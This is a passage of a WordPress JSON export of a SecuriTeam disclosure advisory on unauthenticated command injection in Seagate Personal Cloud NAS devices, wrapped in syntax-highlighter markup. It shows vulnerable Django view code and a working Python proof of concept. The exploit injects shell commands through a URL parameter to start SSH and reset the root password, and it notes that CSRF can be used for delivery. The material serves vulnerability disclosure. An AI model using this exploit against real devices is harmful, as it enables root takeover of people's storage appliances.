{&#8220;url&#8221;:&#8221;%s&#8221;, &#8220;fileSize&#8221;:&#8221;%d&#8221;}}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quote<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">encode<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;utf-8&#8217;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getsize<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-14\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;853&#8243;,&#8221;message&#8221;:&#8221;Id not recognized.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-16\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-17\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">commands<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">getstatusoutput<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd_base<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216; start &#8216;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">time_stamp<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">status<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;ok&#8221;, &#8220;data&#8221;: {&#8220;archiveID&#8221;:&#8221;%s&#8221;}}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">output<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072ca158551842-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">except<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072ca158551842-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">HttpResponse<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;{&#8220;stat&#8221;:&#8221;failed&#8221;, &#8220;code&#8221;:&#8221;852&#8243;,&#8221;message&#8221;:&#8221;Zip file not created.&#8221;}&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0055 seconds] -->  <\/p>\n<p>Note that both views contain the csrf_exempt decorator, which disables the default Cross-Site Request Forgery protection of Django. As such, these issues can be exploited via Cross-Site Request Forgery.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> The following proof of concept will try to enable the SSH service, and change the root password. When successful it will be possible to log into the device over SSH with the new password.<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-5a57e2e1072d0284540628\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python  import os  import urllib       scheme = &#8216;http&#8217;  host = &#8216;personalcloud.local&#8217;  port = &#8217;80&#8217;  path = &#8216;uploadTelemetry.psp&#8217;  querystr = &#8216;TimeStamp=%3b&#8217;  #path = &#8216;getLogs.psp&#8217;  #querystr = &#8216;time_stamp=%3b&#8217;  password = &#8216;Welcome01&#8217;       cmds = [&#8216;ngc &#8211;start sshd 2&gt;&amp;1&#8217;,        &#8216;echo -e &#8220;%(s)sn%(s)s&#8221;|passwd 2&gt;&amp;1&#8217; % {&#8216;s&#8217; : password}]       for cmd in cmds:     print &#8216;Running command&#8217;, repr(cmd)     cmd = urllib.quote_plus(cmd)     r = urllib.urlopen(&#8216;%s:\/\/%s:%s\/%s?%s%s&#8217; % (scheme, host, port, path, querystr, cmd))     print r.read()       print &#8216;Log in with&#8217;, password  os.system(&#8216;ssh -p 2222 root@%s&#8217; % host)<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-1\">1<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-2\">2<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-3\">3<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-4\">4<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-5\">5<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-6\">6<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-7\">7<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-8\">8<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-9\">9<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-10\">10<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-11\">11<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-12\">12<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-13\">13<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-14\">14<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-15\">15<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-16\">16<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-17\">17<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-18\">18<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-19\">19<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-20\">20<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-21\">21<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-22\">22<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-5a57e2e1072d0284540628-23\">23<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-5a57e2e1072d0284540628-24\">24<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-2\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">os<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-3\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urllib<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-4\"><span class=\"crayon-e\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-5\"><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;http&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-6\"><span class=\"crayon-v\">host<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;personalcloud.local&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-7\"><span class=\"crayon-v\">port<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8217;80&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-8\"><span class=\"crayon-v\">path<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;uploadTelemetry.psp&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-9\"><span class=\"crayon-v\">querystr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;TimeStamp=%3b&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-10\"><span class=\"crayon-p\">#path = &#8216;getLogs.psp&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-11\"><span class=\"crayon-p\">#querystr = &#8216;time_stamp=%3b&#8217;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-12\"><span class=\"crayon-v\">password<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Welcome01&#8217;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-13\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-14\"><span class=\"crayon-v\">cmds<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-s\">&#8216;ngc &#8211;start sshd 2&gt;&amp;1&#8217;<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-s\">&#8216;echo -e &#8220;%(s)sn%(s)s&#8221;|passwd 2&gt;&amp;1&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-s\">&#8216;s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">:<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">password<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-16\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-17\"><span class=\"crayon-st\">for<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">cmd <\/span><span class=\"crayon-st\">in<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmds<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-18\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Running command&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">repr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-19\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">quote_plus<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-20\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">urlopen<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;%s:\/\/%s:%s\/%s?%s%s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">scheme<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">port<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">path<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">querystr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">cmd<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-21\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-22\"><span class=\"crayon-h\">&nbsp;&nbsp; <\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5a57e2e1072d0284540628-23\"><span class=\"crayon-i\">print<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&#8216;Log in with&#8217;<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">password<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5a57e2e1072d0284540628-24\"><span class=\"crayon-v\">os<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">system<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8216;ssh -p 2222 root@%s&#8217;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">host<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<\/div>\n<\/td>\n<\/tr>\n<\/table><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0033 seconds] -->  <\/p>\n<div class=\"printfriendly pf-alignleft\"><a href=\"#\" rel=\"nofollow\" onclick=\"window.print(); return false;\" class=\"noslimstat\" title=\"Printer Friendly, PDF &#038; Email\"><img decoding=\"async\" style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3548\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Thu, 11 Jan 2018 13:45:21 +0000<\/strong><\/p>\n<p>Vulnerabilities summary The following advisory describes two (2) unauthenticated command injection vulnerabilities. Seagate Personal Cloud Home Media Storage is &#8220;the easiest way to store, organize, stream and share all your music, movies, photos, and important documents.&#8221; Credit An independent security researcher, Yorick Koster, has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program Vendor &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3548\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Seagate Personal Cloud Multiple Vulnerabilities<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[11851,10757],"class_list":["post-11081","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-remote-command-execution","tag-securiteam-secure-disclosure"],"_links":{"self":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11081","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11081"}],"version-history":[{"count":0,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11081\/revisions"}],"wp:attachment":[{"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11081"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11081"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11081"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}